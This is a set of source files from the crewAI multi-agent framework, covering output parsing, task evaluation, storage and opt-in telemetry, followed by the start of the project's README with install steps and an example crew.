'{self.prompt_file}' not found.") except json.JSONDecodeError: raise Exception("Error decoding JSON from the prompts file.") if not self._prompts: self._prompts = {} return self def slice(self, slice: str) -> str: return self.retrieve("slices", slice) def errors(self, error: str) -> str: return self.retrieve("errors", error) def tools(self, error: str) -> str: return self.retrieve("tools", error) def retrieve(self, kind, key) -> str: try: return self._prompts[kind][key] except Exception as _: raise Exception(f"Prompt for '{kind}':'{key}' not found.") File: src/crewai/utilities/crew_pydantic_output_parser.py import json from typing import Any, List, Type import regex from langchain.output_parsers import PydanticOutputParser from langchain_core.exceptions import OutputParserException from langchain_core.outputs import Generation from pydantic import BaseModel, ValidationError class CrewPydanticOutputParser(PydanticOutputParser): """Parses the text into pydantic models""" pydantic_object: Type[BaseModel] def parse_result(self, result: List[Generation]) -> Any: result[0].text = self._transform_in_valid_json(result[0].text) # Treating edge case of function calling llm returning the name instead of tool_name json_object = json.loads(result[0].text) if "tool_name" not in json_object: json_object["tool_name"] = json_object.get("name", "") result[0].text = json.dumps(json_object) try: return self.pydantic_object.model_validate(json_object) except ValidationError as e: name = self.pydantic_object.__name__ msg = f"Failed to parse {name} from completion {json_object}. Got: {e}" raise OutputParserException(msg, llm_output=json_object) def _transform_in_valid_json(self, text) -> str: text = text.replace("```", "").replace("json", "") json_pattern = r"\{(?:[^{}]|(?R))*\}" matches = regex.finditer(json_pattern, text) for match in matches: try: # Attempt to parse the matched string as JSON json_obj = json.loads(match.group()) # Return the first successfully parsed JSON object json_obj = json.dumps(json_obj) return str(json_obj) except json.JSONDecodeError: # If parsing fails, skip to the next match continue return text File: src/crewai/utilities/task_output_storage_handler.py from pydantic import BaseModel, Field from datetime import datetime from typing import Dict, Any, Optional, List from crewai.memory.storage.kickoff_task_outputs_storage import ( KickoffTaskOutputsSQLiteStorage, ) from crewai.task import Task class ExecutionLog(BaseModel): task_id: str expected_output: Optional[str] = None output: Dict[str, Any] timestamp: datetime = Field(default_factory=datetime.now) task_index: int inputs: Dict[str, Any] = Field(default_factory=dict) was_replayed: bool = False def __getitem__(self, key: str) -> Any: return getattr(self, key) class TaskOutputStorageHandler: def __init__(self) -> None: self.storage = KickoffTaskOutputsSQLiteStorage() def update(self, task_index: int, log: Dict[str, Any]): saved_outputs = self.load() if saved_outputs is None: raise ValueError("Logs cannot be None") if log.get("was_replayed", False): replayed = { "task_id": str(log["task"].id), "expected_output": log["task"].expected_output, "output": log["output"], "was_replayed": log["was_replayed"], "inputs": log["inputs"], } self.storage.update( task_index, **replayed, ) else: self.storage.add(**log) def add( self, task: Task, output: Dict[str, Any], task_index: int, inputs: Dict[str, Any] = {}, was_replayed: bool = False, ): self.storage.add(task, output, task_index, was_replayed, inputs) def reset(self): self.storage.delete_all() def load(self) -> Optional[List[Dict[str, Any]]]: return self.storage.load() File: src/crewai/utilities/printer.py class Printer: def print(self, content: str, color: str): if color == "purple": self._print_purple(content) elif color == "red": self._print_red(content) elif color == "bold_green": self._print_bold_green(content) elif color == "bold_purple": self._print_bold_purple(content) elif color == "bold_blue": self._print_bold_blue(content) elif color == "yellow": self._print_yellow(content) else: print(content) def _print_bold_purple(self, content): print("\033[1m\033[95m {}\033[00m".format(content)) def _print_bold_green(self, content): print("\033[1m\033[92m {}\033[00m".format(content)) def _print_purple(self, content): print("\033[95m {}\033[00m".format(content)) def _print_red(self, content): print("\033[91m {}\033[00m".format(content)) def _print_bold_blue(self, content): print("\033[1m\033[94m {}\033[00m".format(content)) def _print_yellow(self, content): print("\033[93m {}\033[00m".format(content)) File: src/crewai/utilities/exceptions/context_window_exceeding_exception.py class LLMContextLengthExceededException(Exception): CONTEXT_LIMIT_ERRORS = [ "maximum context length", "context length exceeded", "context_length_exceeded", "context window full", "too many tokens", "input is too long", "exceeds token limit", ] def __init__(self, error_message: str): self.original_error_message = error_message super().__init__(self._get_error_message(error_message)) def _is_context_limit_error(self, error_message: str) -> bool: return any( phrase.lower() in error_message.lower() for phrase in self.CONTEXT_LIMIT_ERRORS ) def _get_error_message(self, error_message: str): return ( f"LLM context length exceeded. Original error: {error_message}\n" "Consider using a smaller input or implementing a text splitting strategy." ) File: src/crewai/utilities/evaluators/task_evaluator.py import os from typing import List from langchain_openai import ChatOpenAI from pydantic import BaseModel, Field from crewai.utilities import Converter from crewai.utilities.pydantic_schema_parser import PydanticSchemaParser def mock_agent_ops_provider(): def track_agent(*args, **kwargs): def noop(f): return f return noop return track_agent agentops = None if os.environ.get("AGENTOPS_API_KEY"): try: from agentops import track_agent except ImportError: track_agent = mock_agent_ops_provider() else: track_agent = mock_agent_ops_provider() class Entity(BaseModel): name: str = Field(description="The name of the entity.") type: str = Field(description="The type of the entity.") description: str = Field(description="Description of the entity.") relationships: List[str] = Field(description="Relationships of the entity.") class TaskEvaluation(BaseModel): suggestions: List[str] = Field( description="Suggestions to improve future similar tasks." ) quality: float = Field( description="A score from 0 to 10 evaluating on completion, quality, and overall performance, all taking into account the task description, expected output, and the result of the task." ) entities: List[Entity] = Field( description="Entities extracted from the task output." ) class TrainingTaskEvaluation(BaseModel): suggestions: List[str] = Field( description="Based on the Human Feedbacks and the comparison between Initial Outputs and Improved outputs provide action items based on human_feedback for future tasks." ) quality: float = Field( description="A score from 0 to 10 evaluating on completion, quality, and overall performance from the improved output to the initial output based on the human feedback." ) final_summary: str = Field( description="A step by step action items to improve the next Agent based on the human-feedback and improved output." ) @track_agent(name="Task Evaluator") class TaskEvaluator: def __init__(self, original_agent): self.llm = original_agent.llm def evaluate(self, task, output) -> TaskEvaluation: evaluation_query = ( f"Assess the quality of the task completed based on the description, expected output, and actual results.\n\n" f"Task Description:\n{task.description}\n\n" f"Expected Output:\n{task.expected_output}\n\n" f"Actual Output:\n{output}\n\n" "Please provide:\n" "- Bullet points suggestions to improve future similar tasks\n" "- A score from 0 to 10 evaluating on completion, quality, and overall performance" "- Entities extracted from the task output, if any, their type, description, and relationships" ) instructions = "Convert all responses into valid JSON output." if not self._is_gpt(self.llm): model_schema = PydanticSchemaParser(model=TaskEvaluation).get_schema() instructions = f"{instructions}\n\nReturn only valid JSON with the following schema:\n```json\n{model_schema}\n```" converter = Converter( llm=self.llm, text=evaluation_query, model=TaskEvaluation, instructions=instructions, ) return converter.to_pydantic() def _is_gpt(self, llm) -> bool: return isinstance(llm, ChatOpenAI) and llm.openai_api_base is None def evaluate_training_data( self, training_data: dict, agent_id: str ) -> TrainingTaskEvaluation: """ Evaluate the training data based on the llm output, human feedback, and improved output. Parameters: - training_data (dict): The training data to be evaluated. - agent_id (str): The ID of the agent. """ output_training_data = training_data[agent_id] final_aggregated_data = "" for _, data in output_training_data.items(): final_aggregated_data += ( f"Initial Output:\n{data['initial_output']}\n\n" f"Human Feedback:\n{data['human_feedback']}\n\n" f"Improved Output:\n{data['improved_output']}\n\n" ) evaluation_query = ( "Assess the quality of the training data based on the llm output, human feedback , and llm output improved result.\n\n" f"{final_aggregated_data}" "Please provide:\n" "- Based on the Human Feedbacks and the comparison between Initial Outputs and Improved outputs provide action items based on human_feedback for future tasks\n" "- A score from 0 to 10 evaluating on completion, quality, and overall performance from the improved output to the initial output based on the human feedback\n" ) instructions = "I'm gonna convert this raw text into valid JSON." if not self._is_gpt(self.llm): model_schema = PydanticSchemaParser( model=TrainingTaskEvaluation ).get_schema() instructions = f"{instructions}\n\nThe json should have the following structure, with the following keys:\n{model_schema}" converter = Converter( llm=self.llm, text=evaluation_query, model=TrainingTaskEvaluation, instructions=instructions, ) pydantic_result = converter.to_pydantic() return pydantic_result File: src/crewai/utilities/evaluators/crew_evaluator_handler.py from collections import defaultdict from crewai.agent import Agent from crewai.task import Task from crewai.tasks.task_output import TaskOutput from crewai.telemetry import Telemetry from langchain_openai import ChatOpenAI from pydantic import BaseModel, Field from rich.box import HEAVY_EDGE from rich.console import Console from rich.table import Table class TaskEvaluationPydanticOutput(BaseModel): quality: float = Field( description="A score from 1 to 10 evaluating on completion, quality, and overall performance from the task_description and task_expected_output to the actual Task Output." ) class CrewEvaluator: """ A class to evaluate the performance of the agents in the crew based on the tasks they have performed. Attributes: crew (Crew): The crew of agents to evaluate. openai_model_name (str): The model to use for evaluating the performance of the agents (for now ONLY OpenAI accepted). tasks_scores (defaultdict): A dictionary to store the scores of the agents for each task. iteration (int): The current iteration of the evaluation. """ tasks_scores: defaultdict = defaultdict(list) run_execution_times: defaultdict = defaultdict(list) iteration: int = 0 def __init__(self, crew, openai_model_name: str): self.crew = crew self.openai_model_name = openai_model_name self._telemetry = Telemetry() self._setup_for_evaluating() def _setup_for_evaluating(self) -> None: """Sets up the crew for evaluating.""" for task in self.crew.tasks: task.callback = self.evaluate def _evaluator_agent(self): return Agent( role="Task Execution Evaluator", goal=( "Your goal is to evaluate the performance of the agents in the crew based on the tasks they have performed using score from 1 to 10 evaluating on completion, quality, and overall performance." ), backstory="Evaluator agent for crew evaluation with precise capabilities to evaluate the performance of the agents in the crew based on the tasks they have performed", verbose=False, llm=ChatOpenAI(model=self.openai_model_name), ) def _evaluation_task( self, evaluator_agent: Agent, task_to_evaluate: Task, task_output: str ) -> Task: return Task( description=( "Based on the task description and the expected output, compare and evaluate the performance of the agents in the crew based on the Task Output they have performed using score from 1 to 10 evaluating on completion, quality, and overall performance." f"task_description: {task_to_evaluate.description} " f"task_expected_output: {task_to_evaluate.expected_output} " f"agent: {task_to_evaluate.agent.role if task_to_evaluate.agent else None} " f"agent_goal: {task_to_evaluate.agent.goal if task_to_evaluate.agent else None} " f"Task Output: {task_output}" ), expected_output="Evaluation Score from 1 to 10 based on the performance of the agents on the tasks", agent=evaluator_agent, output_pydantic=TaskEvaluationPydanticOutput, ) def set_iteration(self, iteration: int) -> None: self.iteration = iteration def print_crew_evaluation_result(self) -> None: """ Prints the evaluation result of the crew in a table. A Crew with 2 tasks using the command crewai test -n 3 will output the following table: Tasks Scores (1-10 Higher is better) ┏━━━━━━━━━━━━━━━━━━━━┳━━━━━━━┳━━━━━━━┳━━━━━━━┳━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓ ┃ Tasks/Crew/Agents ┃ Run 1 ┃ Run 2 ┃ Run 3 ┃ Avg. Total ┃ Agents ┃ ┡━━━━━━━━━━━━━━━━━━━━╇━━━━━━━╇━━━━━━━╇━━━━━━━╇━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┩ │ Task 1 │ 9.0 │ 10.0 │ 9.0 │ 9.3 │ - AI LLMs Senior Researcher │ │ │ │ │ │ │ - AI LLMs Reporting Analyst │ │ │ │ │ │ │ │ │ Task 2 │ 9.0 │ 9.0 │ 9.0 │ 9.0 │ - AI LLMs Senior Researcher │ │ │ │ │ │ │ - AI LLMs Reporting Analyst │ │ │ │ │ │ │ │ │ Crew │ 9.0 │ 9.5 │ 9.0 │ 9.2 │ │ │ Execution Time (s) │ 42 │ 79 │ 52 │ 57 │ │ └────────────────────┴───────┴───────┴───────┴────────────┴──────────────────────────────┘ """ task_averages = [ sum(scores) / len(scores) for scores in zip(*self.tasks_scores.values()) ] crew_average = sum(task_averages) / len(task_averages) table = Table(title="Tasks Scores \n (1-10 Higher is better)", box=HEAVY_EDGE) table.add_column("Tasks/Crew/Agents", style="cyan") for run in range(1, len(self.tasks_scores) + 1): table.add_column(f"Run {run}", justify="center") table.add_column("Avg. Total", justify="center") table.add_column("Agents", style="green") for task_index, task in enumerate(self.crew.tasks): task_scores = [ self.tasks_scores[run][task_index] for run in range(1, len(self.tasks_scores) + 1) ] avg_score = task_averages[task_index] agents = list(task.processed_by_agents) # Add the task row with the first agent table.add_row( f"Task {task_index + 1}", *[f"{score:.1f}" for score in task_scores], f"{avg_score:.1f}", f"- {agents[0]}" if agents else "", ) # Add rows for additional agents for agent in agents[1:]: table.add_row("", "", "", "", "", f"- {agent}") # Add a blank separator row if it's not the last task if task_index < len(self.crew.tasks) - 1: table.add_row("", "", "", "", "", "") # Add Crew and Execution Time rows crew_scores = [ sum(self.tasks_scores[run]) / len(self.tasks_scores[run]) for run in range(1, len(self.tasks_scores) + 1) ] table.add_row( "Crew", *[f"{score:.2f}" for score in crew_scores], f"{crew_average:.1f}", "", ) run_exec_times = [ int(sum(tasks_exec_times)) for _, tasks_exec_times in self.run_execution_times.items() ] execution_time_avg = int(sum(run_exec_times) / len(run_exec_times)) table.add_row( "Execution Time (s)", *map(str, run_exec_times), f"{execution_time_avg}", "" ) console = Console() console.print(table) def evaluate(self, task_output: TaskOutput): """Evaluates the performance of the agents in the crew based on the tasks they have performed.""" current_task = None for task in self.crew.tasks: if task.description == task_output.description: current_task = task break if not current_task or not task_output: raise ValueError( "Task to evaluate and task output are required for evaluation" ) evaluator_agent = self._evaluator_agent() evaluation_task = self._evaluation_task( evaluator_agent, current_task, task_output.raw ) evaluation_result = evaluation_task.execute_sync() if isinstance(evaluation_result.pydantic, TaskEvaluationPydanticOutput): self._test_result_span = self._telemetry.individual_test_result_span( self.crew, evaluation_result.pydantic.quality, current_task._execution_time, self.openai_model_name, ) self.tasks_scores[self.iteration].append(evaluation_result.pydantic.quality) self.run_execution_times[self.iteration].append( current_task._execution_time ) else: raise ValueError("Evaluation result is not in the expected format") File: src/crewai/telemetry/__init__.py from .telemetry import Telemetry __all__ = ["Telemetry"] File: src/crewai/telemetry/telemetry.py from __future__ import annotations import asyncio import json import os import platform from typing import TYPE_CHECKING, Any, Optional import pkg_resources from opentelemetry import trace from opentelemetry.exporter.otlp.proto.http.trace_exporter import OTLPSpanExporter from opentelemetry.sdk.resources import SERVICE_NAME, Resource from opentelemetry.sdk.trace import TracerProvider from opentelemetry.sdk.trace.export import BatchSpanProcessor from opentelemetry.trace import Span, Status, StatusCode if TYPE_CHECKING: from crewai.crew import Crew from crewai.task import Task class Telemetry: """A class to handle anonymous telemetry for the crewai package. The data being collected is for development purpose, all data is anonymous. There is NO data being collected on the prompts, tasks descriptions agents backstories or goals nor responses or any data that is being processed by the agents, nor any secrets and env vars. Users can opt-in to sharing more complete data using the `share_crew` attribute in the Crew class. """ def __init__(self): self.ready = False self.trace_set = False try: telemetry_endpoint = "https://telemetry.crewai.com:4319" self.resource = Resource( attributes={SERVICE_NAME: "crewAI-telemetry"}, ) self.provider = TracerProvider(resource=self.resource) processor = BatchSpanProcessor( OTLPSpanExporter( endpoint=f"{telemetry_endpoint}/v1/traces", timeout=30, ) ) self.provider.add_span_processor(processor) self.ready = True except BaseException as e: if isinstance( e, (SystemExit, KeyboardInterrupt, GeneratorExit, asyncio.CancelledError), ): raise # Re-raise the exception to not interfere with system signals self.ready = False def set_tracer(self): if self.ready and not self.trace_set: try: trace.set_tracer_provider(self.provider) self.trace_set = True except Exception: self.ready = False self.trace_set = False def crew_creation(self, crew: Crew, inputs: dict[str, Any] | None): """Records the creation of a crew.""" if self.ready: try: tracer = trace.get_tracer("crewai.telemetry") span = tracer.start_span("Crew Created") self._add_attribute( span, "crewai_version", pkg_resources.get_distribution("crewai").version, ) self._add_attribute(span, "python_version", platform.python_version()) self._add_attribute(span, "crew_key", crew.key) self._add_attribute(span, "crew_id", str(crew.id)) self._add_attribute(span, "crew_process", crew.process) self._add_attribute(span, "crew_memory", crew.memory) self._add_attribute(span, "crew_number_of_tasks", len(crew.tasks)) self._add_attribute(span, "crew_number_of_agents", len(crew.agents)) if crew.share_crew: self._add_attribute( span, "crew_agents", json.dumps( [ { "key": agent.key, "id": str(agent.id), "role": agent.role, "goal": agent.goal, "backstory": agent.backstory, "verbose?": agent.verbose, "max_iter": agent.max_iter, "max_rpm": agent.max_rpm, "i18n": agent.i18n.prompt_file, "function_calling_llm": json.dumps( self._safe_llm_attributes( agent.function_calling_llm ) ), "llm": json.dumps( self._safe_llm_attributes(agent.llm) ), "delegation_enabled?": agent.allow_delegation, "allow_code_execution?": agent.allow_code_execution, "max_retry_limit": agent.max_retry_limit, "tools_names": [ tool.name.casefold() for tool in agent.tools or [] ], } for agent in crew.agents ] ), ) self._add_attribute( span, "crew_tasks", json.dumps( [ { "key": task.key, "id": str(task.id), "description": task.description, "expected_output": task.expected_output, "async_execution?": task.async_execution, "human_input?": task.human_input, "agent_role": task.agent.role if task.agent else "None", "agent_key": task.agent.key if task.agent else None, "context": ( [task.description for task in task.context] if task.context else None ), "tools_names": [ tool.name.casefold() for tool in task.tools or [] ], } for task in crew.tasks ] ), ) self._add_attribute(span, "platform", platform.platform()) self._add_attribute(span, "platform_release", platform.release()) self._add_attribute(span, "platform_system", platform.system()) self._add_attribute(span, "platform_version", platform.version()) self._add_attribute(span, "cpus", os.cpu_count()) self._add_attribute( span, "crew_inputs", json.dumps(inputs) if inputs else None ) else: self._add_attribute( span, "crew_agents", json.dumps( [ { "key": agent.key, "id": str(agent.id), "role": agent.role, "verbose?": agent.verbose, "max_iter": agent.max_iter, "max_rpm": agent.max_rpm, "function_calling_llm": json.dumps( self._safe_llm_attributes( agent.function_calling_llm ) ), "llm": json.dumps( self._safe_llm_attributes(agent.llm) ), "delegation_enabled?": agent.allow_delegation, "allow_code_execution?": agent.allow_code_execution, "max_retry_limit": agent.max_retry_limit, "tools_names": [ tool.name.casefold() for tool in agent.tools or [] ], } for agent in crew.agents ] ), ) self._add_attribute( span, "crew_tasks", json.dumps( [ { "key": task.key, "id": str(task.id), "async_execution?": task.async_execution, "human_input?": task.human_input, "agent_role": task.agent.role if task.agent else "None", "agent_key": task.agent.key if task.agent else None, "tools_names": [ tool.name.casefold() for tool in task.tools or [] ], } for task in crew.tasks ] ), ) span.set_status(Status(StatusCode.OK)) span.end() except Exception: pass def task_started(self, crew: Crew, task: Task) -> Span | None: """Records task started in a crew.""" if self.ready: try: tracer = trace.get_tracer("crewai.telemetry") created_span = tracer.start_span("Task Created") self._add_attribute(created_span, "crew_key", crew.key) self._add_attribute(created_span, "crew_id", str(crew.id)) self._add_attribute(created_span, "task_key", task.key) self._add_attribute(created_span, "task_id", str(task.id)) if crew.share_crew: self._add_attribute( created_span, "formatted_description", task.description ) self._add_attribute( created_span, "formatted_expected_output", task.expected_output ) created_span.set_status(Status(StatusCode.OK)) created_span.end() span = tracer.start_span("Task Execution") self._add_attribute(span, "crew_key", crew.key) self._add_attribute(span, "crew_id", str(crew.id)) self._add_attribute(span, "task_key", task.key) self._add_attribute(span, "task_id", str(task.id)) if crew.share_crew: self._add_attribute(span, "formatted_description", task.description) self._add_attribute( span, "formatted_expected_output", task.expected_output ) return span except Exception: pass return None def task_ended(self, span: Span, task: Task, crew: Crew): """Records task execution in a crew.""" if self.ready: try: if crew.share_crew: self._add_attribute( span, "task_output", task.output.raw if task.output else "", ) span.set_status(Status(StatusCode.OK)) span.end() except Exception: pass def tool_repeated_usage(self, llm: Any, tool_name: str, attempts: int): """Records the repeated usage 'error' of a tool by an agent.""" if self.ready: try: tracer = trace.get_tracer("crewai.telemetry") span = tracer.start_span("Tool Repeated Usage") self._add_attribute( span, "crewai_version", pkg_resources.get_distribution("crewai").version, ) self._add_attribute(span, "tool_name", tool_name) self._add_attribute(span, "attempts", attempts) if llm: self._add_attribute( span, "llm", json.dumps(self._safe_llm_attributes(llm)) ) span.set_status(Status(StatusCode.OK)) span.end() except Exception: pass def tool_usage(self, llm: Any, tool_name: str, attempts: int): """Records the usage of a tool by an agent.""" if self.ready: try: tracer = trace.get_tracer("crewai.telemetry") span = tracer.start_span("Tool Usage") self._add_attribute( span, "crewai_version", pkg_resources.get_distribution("crewai").version, ) self._add_attribute(span, "tool_name", tool_name) self._add_attribute(span, "attempts", attempts) if llm: self._add_attribute( span, "llm", json.dumps(self._safe_llm_attributes(llm)) ) span.set_status(Status(StatusCode.OK)) span.end() except Exception: pass def tool_usage_error(self, llm: Any): """Records the usage of a tool by an agent.""" if self.ready: try: tracer = trace.get_tracer("crewai.telemetry") span = tracer.start_span("Tool Usage Error") self._add_attribute( span, "crewai_version", pkg_resources.get_distribution("crewai").version, ) if llm: self._add_attribute( span, "llm", json.dumps(self._safe_llm_attributes(llm)) ) span.set_status(Status(StatusCode.OK)) span.end() except Exception: pass def individual_test_result_span( self, crew: Crew, quality: float, exec_time: int, model_name: str ): if self.ready: try: tracer = trace.get_tracer("crewai.telemetry") span = tracer.start_span("Crew Individual Test Result") self._add_attribute( span, "crewai_version", pkg_resources.get_distribution("crewai").version, ) self._add_attribute(span, "crew_key", crew.key) self._add_attribute(span, "crew_id", str(crew.id)) self._add_attribute(span, "quality", str(quality)) self._add_attribute(span, "exec_time", str(exec_time)) self._add_attribute(span, "model_name", model_name) span.set_status(Status(StatusCode.OK)) span.end() except Exception: pass def test_execution_span( self, crew: Crew, iterations: int, inputs: dict[str, Any] | None, model_name: str, ): if self.ready: try: tracer = trace.get_tracer("crewai.telemetry") span = tracer.start_span("Crew Test Execution") self._add_attribute( span, "crewai_version", pkg_resources.get_distribution("crewai").version, ) self._add_attribute(span, "crew_key", crew.key) self._add_attribute(span, "crew_id", str(crew.id)) self._add_attribute(span, "iterations", str(iterations)) self._add_attribute(span, "model_name", model_name) if crew.share_crew: self._add_attribute( span, "inputs", json.dumps(inputs) if inputs else None ) span.set_status(Status(StatusCode.OK)) span.end() except Exception: pass def deploy_signup_error_span(self): if self.ready: try: tracer = trace.get_tracer("crewai.telemetry") span = tracer.start_span("Deploy Signup Error") span.set_status(Status(StatusCode.OK)) span.end() except Exception: pass def start_deployment_span(self, uuid: Optional[str] = None): if self.ready: try: tracer = trace.get_tracer("crewai.telemetry") span = tracer.start_span("Start Deployment") if uuid: self._add_attribute(span, "uuid", uuid) span.set_status(Status(StatusCode.OK)) span.end() except Exception: pass def create_crew_deployment_span(self): if self.ready: try: tracer = trace.get_tracer("crewai.telemetry") span = tracer.start_span("Create Crew Deployment") span.set_status(Status(StatusCode.OK)) span.end() except Exception: pass def get_crew_logs_span(self, uuid: Optional[str], log_type: str = "deployment"): if self.ready: try: tracer = trace.get_tracer("crewai.telemetry") span = tracer.start_span("Get Crew Logs") self._add_attribute(span, "log_type", log_type) if uuid: self._add_attribute(span, "uuid", uuid) span.set_status(Status(StatusCode.OK)) span.end() except Exception: pass def remove_crew_span(self, uuid: Optional[str] = None): if self.ready: try: tracer = trace.get_tracer("crewai.telemetry") span = tracer.start_span("Remove Crew") if uuid: self._add_attribute(span, "uuid", uuid) span.set_status(Status(StatusCode.OK)) span.end() except Exception: pass def crew_execution_span(self, crew: Crew, inputs: dict[str, Any] | None): """Records the complete execution of a crew. This is only collected if the user has opted-in to share the crew. """ self.crew_creation(crew, inputs) if (self.ready) and (crew.share_crew): try: tracer = trace.get_tracer("crewai.telemetry") span = tracer.start_span("Crew Execution") self._add_attribute( span, "crewai_version", pkg_resources.get_distribution("crewai").version, ) self._add_attribute(span, "crew_key", crew.key) self._add_attribute(span, "crew_id", str(crew.id)) self._add_attribute( span, "crew_inputs", json.dumps(inputs) if inputs else None ) self._add_attribute( span, "crew_agents", json.dumps( [ { "key": agent.key, "id": str(agent.id), "role": agent.role, "goal": agent.goal, "backstory": agent.backstory, "verbose?": agent.verbose, "max_iter": agent.max_iter, "max_rpm": agent.max_rpm, "i18n": agent.i18n.prompt_file, "llm": json.dumps(self._safe_llm_attributes(agent.llm)), "delegation_enabled?": agent.allow_delegation, "tools_names": [ tool.name.casefold() for tool in agent.tools or [] ], } for agent in crew.agents ] ), ) self._add_attribute( span, "crew_tasks", json.dumps( [ { "id": str(task.id), "description": task.description, "expected_output": task.expected_output, "async_execution?": task.async_execution, "human_input?": task.human_input, "agent_role": task.agent.role if task.agent else "None", "agent_key": task.agent.key if task.agent else None, "context": ( [task.description for task in task.context] if task.context else None ), "tools_names": [ tool.name.casefold() for tool in task.tools or [] ], } for task in crew.tasks ] ), ) return span except Exception: pass def end_crew(self, crew, final_string_output): if (self.ready) and (crew.share_crew): try: self._add_attribute( crew._execution_span, "crewai_version", pkg_resources.get_distribution("crewai").version, ) self._add_attribute( crew._execution_span, "crew_output", final_string_output ) self._add_attribute( crew._execution_span, "crew_tasks_output", json.dumps( [ { "id": str(task.id), "description": task.description, "output": task.output.raw_output, } for task in crew.tasks ] ), ) crew._execution_span.set_status(Status(StatusCode.OK)) crew._execution_span.end() except Exception: pass def _add_attribute(self, span, key, value): """Add an attribute to a span.""" try: return span.set_attribute(key, value) except Exception: pass def _safe_llm_attributes(self, llm): attributes = ["name", "model_name", "model", "top_k", "temperature"] if llm: safe_attributes = {k: v for k, v in vars(llm).items() if k in attributes} safe_attributes["class"] = llm.__class__.__name__ return safe_attributes return {}
<div align="center"> ![Logo of crewAI, two people rowing on a boat](./docs/crewai_logo.png) # **crewAI** 🤖 **crewAI**: Cutting-edge framework for orchestrating role-playing, autonomous AI agents. By fostering collaborative intelligence, CrewAI empowers agents to work together seamlessly, tackling complex tasks. <h3> [Homepage](https://www.crewai.com/) | [Documentation](https://docs.crewai.com/) | [Chat with Docs](https://chatg.pt/DWjSBZn) | [Examples](https://github.com/crewAIInc/crewAI-examples) | [Discourse](https://community.crewai.com) </h3> [![GitHub Repo stars](https://img.shields.io/github/stars/joaomdmoura/crewAI)](https://github.com/crewAIInc/crewAI) [![License: MIT](https://img.shields.io/badge/License-MIT-green.svg)](https://opensource.org/licenses/MIT) </div> ## Table of contents - [Why CrewAI?](#why-crewai) - [Getting Started](#getting-started) - [Key Features](#key-features) - [Examples](#examples) - [Quick Tutorial](#quick-tutorial) - [Write Job Descriptions](#write-job-descriptions) - [Trip Planner](#trip-planner) - [Stock Analysis](#stock-analysis) - [Connecting Your Crew to a Model](#connecting-your-crew-to-a-model) - [How CrewAI Compares](#how-crewai-compares) - [Contribution](#contribution) - [Telemetry](#telemetry) - [License](#license) ## Why CrewAI? The power of AI collaboration has too much to offer. CrewAI is designed to enable AI agents to assume roles, share goals, and operate in a cohesive unit - much like a well-oiled crew. Whether you're building a smart assistant platform, an automated customer service ensemble, or a multi-agent research team, CrewAI provides the backbone for sophisticated multi-agent interactions. ## Getting Started To get started with CrewAI, follow these simple steps: ### 1. Installation ```shell pip install crewai ``` If you want to install the 'crewai' package along with its optional features that include additional tools for agents, you can do so by using the following command: pip install 'crewai[tools]'. This command installs the basic package and also adds extra components which require more dependencies to function." ```shell pip install 'crewai[tools]' ``` ### 2. Setting Up Your Crew ```python import os from crewai import Agent, Task, Crew, Process from crewai_tools import SerperDevTool os.environ["OPENAI_API_KEY"] = "YOUR_API_KEY" os.environ["SERPER_API_KEY"] = "Your Key" # serper.dev API key # You can choose to use a local model through Ollama for example. See https://docs.crewai.com/how-to/LLM-Connections/ for more information. # os.environ["OPENAI_API_BASE"] = 'http://localhost:11434/v1' # os.environ["OPENAI_MODEL_NAME"] ='openhermes' # Adjust based on available model # os.environ["OPENAI_API_KEY"] ='sk-111111111111111111111111111111111111111111111111' # You can pass an optional llm attribute specifying what model you wanna use. # It can be a local model through Ollama / LM Studio or a remote # model like OpenAI, Mistral, Antrophic or others (https://docs.crewai.com/how-to/LLM-Connections/) # If you don't specify a model, the default is OpenAI gpt-4o # # import os # os.environ['OPENAI_MODEL_NAME'] = 'gpt-3.5-turbo' # # OR # # from langchain_openai import ChatOpenAI search_tool = SerperDevTool() # Define your agents with roles and goals researcher = Agent( role='Senior Research Analyst', goal='Uncover cutting-edge developments in AI and data science', backstory="""You work at a leading tech think tank. Your expertise lies in identifying emerging trends. You have a knack for dissecting complex data and presenting actionable insights.""", verbose=True, allow_delegation=False, # You can pass an optional llm attribute specifying what model you wanna use. # llm=ChatOpenAI(model_name="gpt-3.5", temperature=0.7), tools=[search_tool] ) writer = Agent( role='Tech Content Strategist', goal='Craft compelling content on tech advancements', backstory="""You are a renowned Content Strategist, known for your insightful and engaging articles. You transform complex concepts into compelling narratives.""", verbose=True, allow_delegation=True ) # Create tasks for your agents task1 = Task( description="""Conduct a comprehensive analysis of the latest advancements in AI in 2024. Identify key trends, breakthrough technologies, and potential industry impacts.""", expected_output="Full analysis report in bullet points", agent=researcher ) task2 = Task( description="""Using the insights provided, develop an engaging blog post that highlights the most significant AI advancements. Your post should be informative yet accessible, catering to a tech-savvy audience. Make it sound cool, avoid complex words so it doesn't sound like AI.""", expected_output="Full blog post of at least 4 paragraphs", agent=writer ) # Instantiate your crew with a sequential process crew = Crew( agents=[researcher, writer], tasks=[task1, task2], verbose=True, process = Process.sequential ) # Get your crew to work! result = crew.kickoff() print("######################") print(result) ``` In addition to the sequential process, you can use the hierarchical process, which automatically assigns a manager to the defined crew to properly coordinate the planning and execution of tasks through delegation and validation of results. [See more about the processes here](https://docs.crewai.com/core-concepts/Processes/). ## Key Features - **Role-Based Agent Design**: Customize agents with specific roles, goals, and tools. - **Autonomous Inter-Agent Delegation**: Agents can autonomously delegate tasks and inquire amongst themselves, enhancing problem-solving efficiency. - **Flexible Task Management**: Define tasks with customizable tools and assign them to agents dynamically. - **Processes Driven**: Currently only supports `sequential` task execution and `hierarchical` processes, but more complex processes like consensual and autonomous are being worked on. - **Save output as file**: Save the output of individual tasks as a file, so you can use it later. - **Parse output as Pydantic or Json**: Parse the output of individual tasks as a Pydantic model or as a Json if you want to. - **Works with Open Source Models**: Run your crew using Open AI or open source models refer to the [Connect crewAI to LLMs](https://docs.crewai.com/how-to/LLM-Connections/) page for details on configuring your agents' connections to models, even ones running locally! ![CrewAI Mind Map](./docs/crewAI-mindmap.png "CrewAI Mind Map") ## Examples You can test different real life examples of AI crews in the [crewAI-examples repo](https://github.com/crewAIInc/crewAI-examples?tab=readme-ov-file): - [Landing Page Generator](https://github.com/crewAIInc/crewAI-examples/tree/main/landing_page_generator) - [Having Human input on the execution](https://docs.crewai.com/how-to/Human-Input-on-Execution) - [Trip Planner](https://github.com/crewAIInc/crewAI-examples/tree/main/trip_planner) - [Stock Analysis](https://github.com/crewAIInc/crewAI-examples/tree/main/stock_analysis) ### 